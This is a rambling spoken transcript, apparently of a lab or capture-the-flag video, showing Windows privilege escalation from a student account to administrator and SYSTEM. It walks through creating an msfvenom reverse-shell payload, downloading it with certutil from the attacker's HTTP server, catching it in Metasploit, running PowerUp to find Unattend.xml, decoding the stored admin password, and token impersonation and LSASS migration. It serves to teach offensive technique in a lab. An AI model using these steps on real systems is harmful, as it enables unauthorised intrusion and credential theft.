Hello, hello, hello. Welcome to my other video. I hope you've liked the last ones. I will be making a few ones every week and hopefully 2 times a week if everything is fine. So today I'm gonna go a bit on a topic that will be pretty interesting, I think, because today we have the attacker's machine right here. We have access to it, for example, a PC next to us, or the laptop of a friend or random people, and we have our calling machine right next to us. So the guy's logged in. We don't know the password. The guy here probably doesn't even have admin access, I believe. Let's open the CMD and look, get UID or system info, sorry. And we have here Windows Server 64-bit, and a lot of updates here. And we can see we are a student, and let's see, net user, and we have an administrator, net local group administrator. We're not admin. So basically here we're provided of the PowerSploit repository, which has privilege escalation script power app that we'll be using. And first of all, let's get started in our Kali machine. We have the target IP, and let's quickly get our IP. If config, we get our IP, which is 10.10.24.2, and right away we can start by running this by creating a meterpreter first, a reverse TCP with MSF Venom. So we'll quickly go to the desktop here and MSF Venom, and we'll use this was a Windows. This was a 64-bit system, so we'll use x64 meterpreter and reverse TCP. The we'll set the L host equals 10.10.24.2, and we'll set the L port to 1234, and the file type is going to be an ex executable, and we'll output it as a payload.exe. So here it is in our desktop. For some weird reason, okay, just finished. We're gonna clear this out, and how we're gonna get this to the attacker machine? Let's open a let's create a simple server with a Python module. So Python -m simple HTTP server, and we're gonna set the port 80. So now what we can do is open CMD here and just use the search util -url cache -f and just go to our IP and download that payload.exe and save it as a payload.exe. and it's cert util, sorry, not vert. So this will be downloaded, and we just move that to C users student desktop. Okay, how do you move that? Yeah, payload. Right. So we'll close this simple server and start our Metasploit. But first, let's start our PostgreSQL service. Always mistype that. We're gonna run our handler for the payload. So we're gonna use multi handler. We're gonna set the payload to Windows x64, just what we did with the MSI Venom. TCP, we're gonna set the lhost to ours and set our port to 1234. I will just run this. So we can run this from the CMD as well. And here we have payload.exe. We run this, we get a meterpreter session open. And yeah, now that we have that, we have this meterpreter session on. We can do two things. Use the power up to find any vulnerabilities on this machine. Number one. So we do privilege escalation, and this tool searches for misconfigurations in the Windows system. So let's go to desktop and then power exploit and then privilege escalation, and we can see our power up. And now let's go ahead and before running this, we have to run a command that will bypass the execution policies. So let's do PowerShell -ep bypass, and we can now run the power up. After it's run, we can do invoke privilege escalation audit. A bit slow, yeah. Maybe it's not autocomplete because okay, we have to type that apparently. Priv sc audit, okay. Invoke privilege sc audit term is not recognized. Okay, maybe we have to, okay, we have to import that. So let's try that one more time, actually. Yeah, let's import it, power up and invoke prereq audit. Maybe I'm typing something wrong. So invoke minus. Oh, okay. Okay. Previous. Yeah, sorry about that. So now this is gonna scan the system for any misconfiguration files, anything important. Is gonna search for the unattended file.xml that has the installation files of the Windows and possibly the first password that got created during the Windows installation. If it's still there, we're gonna have that in clear text or in base64 encryption that we can just easily decrypt that and have our password, and we can try that to gain access to the administrator account, which in this account we don't have any privileges, but we can get into something. So for example, let's get UID. Sorry, get UID, and we can see we are a student. If we do here net users, we can see there's an administrator account, and we can see that the username for that account is the net local group administrators. This will not run unless it's on CMD. So net local group administrators. We're gonna see the username is administrator. Members of the administrator. Okay. So this found the file. The privilege escalation audit found the file that we have just right here into C Windows Panther, and we have Unattended.xml. And what we can do, let's download that. So download C Windows Windows Panthera unattended.xml. Okay, maybe we have to go there. C. So cd Windows. Okay, we just made Panthera, and we download unattended. Let's see here. So download unattended.xml, and let's open a new tab here, and with that we can base64 decrypt the after opening it. Let's check it first. So there's a bunch of sensitive information here, but as we see in the auto logon, we have a password that's base64 encrypted, so plain text is false, and the username administrator. So let's have this password here. We're gonna, so what we're gonna do is open a new file. Okay, let's not do that. So let's echo password here, paste. Okay, doesn't wanna password. So here's the password, copy and paste this into password. Okay, and we can use base64 decrypt the password, and it's gonna be admin 123. So here's the administrator password, admin 123. So we now have their password, and what we can do now is using psx, sorry about that, psexec.py, to connect to the administrator account at the 10.2.25.252, and we can use the password admin at 123 and we'll wait a bit. Hopefully it's the right password. Okay, so for some reason this is not working, but since we are here, we can just go change user or run as. We can do run as.exe administrator and cmd. How do we use this? So we do user, yeah, slash user administrator and cmd. The username or password is incorrect. So administrator and cmd.exe. We enter the password admin at 123 and we run this as an administrator. So get UID. It doesn't work, but net. As we see, we have administrator, right? So let's go back. So we can go here to users now, to desk, to administrator and desktop, and here we can see we have our flag here in the desktop. So we can do that, or after getting this simple shell from the student, we can just use the command instead of going directly to the unattended folder and running that power up exploit. We can just use this function, search file unattended.xml, and hit enter, and it's gonna scan the whole system for that file, and if it's gonna find, we're gonna tell us the directory, and we can just then download this and Windows Panther and blah blah blah, and after that basic C4, and then connect or open a new meterpreter session. Well, after getting that, it's one way of getting admin on this machine. The other way is what we did yesterday using the access token impersonation. So we just load incognito on this meterpreter session. So we just type load incognito. I mistyped that, sorry. And after that, we can list tokens minus u, list underscore tokens minus u. It says we don't have anything, so yeah, apparently it is patched on this machine, but we can just try the command impersonate underscore token and manually type this nt authority slash system, but it probably will not work. Yeah, so voila, after having this let's exit this session and let's run this meterpreter session handler again, and from this administrator cmd we can basically see users student desktop and run the payload.exe and an admin, and we'll get tell us administrator. So list tokens minus u token. Sorry, list we load incognito first, then list minus that, and cannot get system. But what we can do is LSAS can migrate to 772, and if we get successful migration to the LSAS service, we can get system. So, well, thank you for watching. I hope you learned something. Patch your Windows. Don't leave your computers unattended. Exactly what this says, unattended. And yeah, don't hack your family, don't hack your friends. This video is only for educational purposes. Beware.